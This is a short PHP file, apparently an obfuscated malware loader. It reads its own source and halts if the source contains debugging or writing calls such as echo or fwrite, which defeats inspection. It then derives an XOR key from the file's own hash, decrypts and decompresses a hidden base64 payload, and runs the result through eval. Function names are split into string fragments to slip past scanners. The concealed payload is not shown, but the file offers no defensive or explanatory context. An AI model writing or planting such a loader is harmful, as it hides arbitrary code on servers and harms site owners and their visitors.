<?php
$fnssvm="d3352337b9ea2e61aa67e64598f1e192";
$qggyttnmo="01560456540152555300550302560e060757505301040d500b5a555350030b53";
$pvgoclgpizqv="6PFaCOUCdefOc4ABXixU0A19G+fp33bpE7PvCG1+sKe3iOBM5HBMutSayhLeivHGgi8sfkt5y3Enp6DPlVnJzMfvtp7qwE272LYYQ8S/ErGdCNNOpSdJgKaAUcNrzwIpyHdgvBMVZyy/UcNzjDSXWFccIyPECRsybDIcehBaQRloJ+Ds9/blMm8moZUSHAlV8rW1ZMkpnJTfQ4UkZsy/yHtPcmYRpY8evPMFMIogHtg06HPRUuQKe9lP9Mw8yPTj27QpnRS9FKgGmzLhJTHbIuTTbGf/oQpA8wNDMGYu9KoCEXrkTFoGS3zEtxjWm1e5YNAOHOncPxPVWnCB1j7/Q3N8PCUAsBoB8MR9BNfIVkYxZYhMRdWmmpaZ94vcHdo+un5oN+Q7PHmqEboWJqXSjeRiVyzmJ2XM3RYOzzhD8Ug3fQJ++mDKpBxVVUHDAF07sabod3qUviqpcMgpPg3ENGKlZLoneea0q+KfNszl628Ys3Sh4HyHldopVR0=";
$fzgbobtgvkw=file_get_contents(__FILE__);
$oyvzydcvx=str_replace($pvgoclgpizqv,"",$fzgbobtgvkw);
if(strpos($oyvzydcvx,"ec"."ho")!==false||strpos($oyvzydcvx,"pr"."int")!==false||strpos($oyvzydcvx,"var_"."dump")!==false||strpos($oyvzydcvx,"file_put_"."contents")!==false||strpos($oyvzydcvx,"fw"."rite")!==false){die();}
$mnjbenpgiyt=str_replace(array($fnssvm,$qggyttnmo),array("SP_0db8fdba","KP_467faa63"),$fzgbobtgvkw);
$idlnknkajb=md5($mnjbenpgiyt);
$gihxmbcfkslu=hex2bin($qggyttnmo);
$ycrzfme="";
$mgrsdj=strlen($idlnknkajb);
for($vyyxya=0;$vyyxya<$mgrsdj;$vyyxya++){
    $ycrzfme.=chr(ord($gihxmbcfkslu[$vyyxya])^ord($idlnknkajb[$vyyxya]));
}
$aomrowria=base64_decode($pvgoclgpizqv);
$aijujkwlxutq=strlen($aomrowria);
$jnwbwpq="";
$eqmred=strlen($ycrzfme);
for($vyyxya=0;$vyyxya<$aijujkwlxutq;$vyyxya++){
    $jnwbwpq.=$aomrowria[$vyyxya]^$ycrzfme[$vyyxya%$eqmred];
}
$yytbmxpbbcr="gz"."in"."fl"."ate";
eval($yytbmxpbbcr($jnwbwpq));
